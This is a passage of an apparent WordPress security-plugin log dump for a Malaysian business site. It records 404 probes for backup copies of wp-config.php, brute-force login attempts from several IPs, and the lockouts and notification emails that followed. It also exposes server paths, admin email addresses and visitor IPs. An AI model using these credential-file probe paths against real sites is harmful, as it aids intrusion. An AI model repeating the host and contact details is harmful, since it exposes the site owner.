s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.9\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.9\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ685X6YXSDJF91Gv2P@bQAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684133.7158\";s:12:\"REQUEST_TIME\";s:10:\"1570684133\";}}','notice','2019-10-10 05:08:55','2019-10-10 05:08:54',35046936,36854408,'https://bintara.com.my/wp-config.php.save.9',1,0,'195.206.105.217'),(27860,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/wp-config.php.save.10\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/wp-config.php.save.10\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:22:\"/wp-config.php.save.10\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6866yUrY9zjNB4Mhe2ogAAAY8\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/wp-config.php.save.10\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/wp-config.php.save.10\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6866yUrY9zjNB4Mhe2ogAAAY8\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"195.206.105.217\";s:11:\"REMOTE_PORT\";s:5:\"47408\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/wp-config.php.save.10\";s:10:\"SCRIPT_URL\";s:22:\"/wp-config.php.save.10\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6866yUrY9zjNB4Mhe2ogAAAY8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684139.8582\";s:12:\"REQUEST_TIME\";s:10:\"1570684139\";}}','notice','2019-10-10 05:09:02','2019-10-10 05:09:00',35045208,36851096,'https://bintara.com.my/wp-config.php.save.10',1,0,'195.206.105.217'),(27861,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ7LKo16ilSZVOsCMeMLDgAAAFM\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:13:\"141.8.142.126\";s:11:\"REMOTE_PORT\";s:5:\"40967\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ7LKo16ilSZVOsCMeMLDgAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570687786.8907\";s:12:\"REQUEST_TIME\";s:10:\"1570687786\";}}','notice','2019-10-10 06:09:49','2019-10-10 06:09:47',34373592,36176288,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'141.8.142.126'),(23472,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-08-29 19:13:04','2019-08-29 19:12:57',17692664,18156216,'https://bintara.com.my/ubiquiti/',1,0,'40.77.167.93'),(26598,0,'lockout','host-lockout::132.148.244.116','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:15:\"132.148.244.116\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:19:00\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:19:00\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:19:00\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:19:00\";s:12:\"lockout_host\";s:15:\"132.148.244.116\";}','action','2019-09-21 15:19:01','2019-09-21 15:19:00',19314656,20716744,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(26599,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:15:\"132.148.244.116\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:19:00\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:19:00\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:19:00\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:19:00\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:19:01','2019-09-21 15:19:00',19314624,20716744,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(26600,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:19:01','2019-09-21 15:19:00',19522520,20716744,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(26601,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY-aEnlR@6WyRVzpiDrXwAAABE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"104.131.3.165\";s:11:\"REMOTE_PORT\";s:5:\"45131\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY-aEnlR@6WyRVzpiDrXwAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079144.2626\";s:12:\"REQUEST_TIME\";s:10:\"1569079144\";}}','notice','2019-09-21 15:19:05','2019-09-21 15:19:04',19228520,20717136,'https://bintara.com.my/blog/wp-login.php',1,0,'104.131.3.165'),(26602,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:19:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:19:04\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:19:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:19:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:19:05','2019-09-21 15:19:04',19313760,20717136,'https://bintara.com.my/blog/wp-login.php',1,0,'104.131.3.165'),(26603,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:19:05','2019-09-21 15:19:04',19521296,20717136,'https://bintara.com.my/blog/wp-login.php',1,0,'104.131.3.165'),(26604,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY-i0nlR@6WyRVzpiDrbwAAABQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"51.158.167.187\";s:11:\"REMOTE_PORT\";s:5:\"45582\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY-i0nlR@6WyRVzpiDrbwAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079179.8364\";s:12:\"REQUEST_TIME\";s:10:\"1569079179\";}}','notice','2019-09-21 15:19:41','2019-09-21 15:19:40',19229200,20717592,'https://bintara.com.my/wp/wp-login.php',1,0,'51.158.167.187'),(26605,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:19:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:19:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:19:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:19:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:19:41','2019-09-21 15:19:40',19314160,20717592,'https://bintara.com.my/wp/wp-login.php',1,0,'51.158.167.187'),(26606,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:19:41','2019-09-21 15:19:40',19522296,20717592,'https://bintara.com.my/wp/wp-login.php',1,0,'51.158.167.187'),(26607,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY-8knlR@6WyRVzpiDroAAAAA0\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.178.187\";s:11:\"REMOTE_PORT\";s:5:\"34824\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY-8knlR@6WyRVzpiDroAAAAA0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079282.8782\";s:12:\"REQUEST_TIME\";s:10:\"1569079282\";}}','notice','2019-09-21 15:21:24','2019-09-21 15:21:23',19230928,20720496,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.178.187'),(26608,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:21:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:21:23\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:21:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:21:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:21:24','2019-09-21 15:21:23',19316616,20720496,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.178.187'),(26609,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:21:24','2019-09-21 15:21:23',19524408,20720496,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.178.187'),(26610,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY-@knlR@6WyRVzpiDrowAAAAA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"192.254.207.43\";s:11:\"REMOTE_PORT\";s:5:\"52656\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMI